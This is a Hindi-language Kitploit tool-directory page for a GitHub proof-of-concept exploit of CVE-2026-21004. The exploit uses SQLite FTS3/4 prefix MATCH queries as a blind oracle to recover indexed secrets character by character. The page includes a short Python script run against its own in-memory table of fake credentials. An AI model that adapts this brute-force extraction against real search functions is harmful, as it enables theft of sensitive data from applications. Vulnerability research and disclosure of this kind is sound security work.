Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting — CVE-2026-21004 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: ब्लाइंड ओरेकल के रूप में तैयार की गई SQLite FTS3/4 MATCH प्रीफिक्स क्वेरी का उपयोग करके अनुक्रमित गुप्त डेटा को अक्षर-दर-अक्षर पुनर्प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/george0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting
भेद्यता विश्लेषणशोषणडेटा निष्कासनडेटाबेस सुरक्षा
GitHubgeorge0papasotiriou/cve-2026-21004-sqlite-fts3-match-infoleak-via-query-crafting

CVE-2026-21004-SQLite-FTS3-Match-Infoleak-via-Query-Crafting

CVE-2026-21004 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: ब्लाइंड ओरेकल के रूप में तैयार की गई SQLite FTS3/4 MATCH प्रीफिक्स क्वेरी का उपयोग करके अनुक्रमित गुप्त डेटा को अक्षर-दर-अक्षर पुनर्प्राप्त करता है।

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
17 दिन पहलेअभी तक समीक्षित नहीं

CVE-2026-21004 – SQLite FTS3 क्वेरी क्राफ्टिंग के माध्यम से मैच इन्फोलीक

प्रोग्राम कोड (Python)

root@kitploit:~
# sqlite_fts_leak.py - Creates FTS table and exploits match info
import sqlite3

conn = sqlite3.connect(':memory:')
conn.execute("CREATE VIRTUAL TABLE secrets USING fts4(content TEXT)")
conn.execute("INSERT INTO secrets VALUES ('admin:password123')")
conn.execute("INSERT INTO secrets VALUES ('user:secret456')")

# Attacker guesses characters using FTS MATCH with partial matching
def guess_char(prefix, known):
    for c in "abcdefghijklmnopqrstuvwxyz0123456789_:":
        query = f'SELECT * FROM secrets WHERE content MATCH ?'
        # In FTS4, MATCH can leak whether a term exists; we abuse by searching column directly
        try:
            cur = conn.execute(query, (f'"{prefix}{c}*"',))
            if cur.fetchone():
                return c
        except:
            pass
    return None

# Recover the secret character by character
prefix = ""
for _ in range(20):
    c = guess_char(prefix, "")
    if c is None: break
    prefix += c
print(f"Recovered: {prefix}")

CVE-2026-21004 – SQLite FTS3/4 मैच सूचना रिसाव

Severity: High

अवलोकन

SQLite FTS4 का उपयोग करने वाला एक एप्लिकेशन एक खोज फ़ंक्शन उजागर करता है जो MATCH क्वेरी के आधार पर परिणाम लौटाता है। यह देखकर कि मैच होता है या नहीं (या समय अंतर देखकर), एक हमलावर फुल‑टेक्स्ट इंडेक्स की सामग्री को कैरेक्टर-दर-कैरेक्टर ब्रूट-फोर्स कर सकता है और संवेदनशील डेटा निकाल सकता है।

भेद्यता विवरण

  • प्रकार: सूचना प्रकटीकरण / ब्लाइंड इंजेक्शन
  • प्रभाव: अनुक्रमित कॉलम्स से डेटा एक्सफिल्ट्रेशन।
  • मूल कारण: FTS MATCH ऑपरेटर प्रीफ़िक्स क्वेरी (term*) का समर्थन करता है, जिससे एक हमलावर पूर्ण टर्म जाने बिना डिक्शनरी अटैक कर सकता है।

एक्सप्लॉइट प्रदर्शन

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python sqlite_fts_leak.py

स्क्रिप्ट क्रमिक रूप से secrets टेबल की सामग्री को पुनर्प्राप्त करती है।


टूल डाउनलोड करें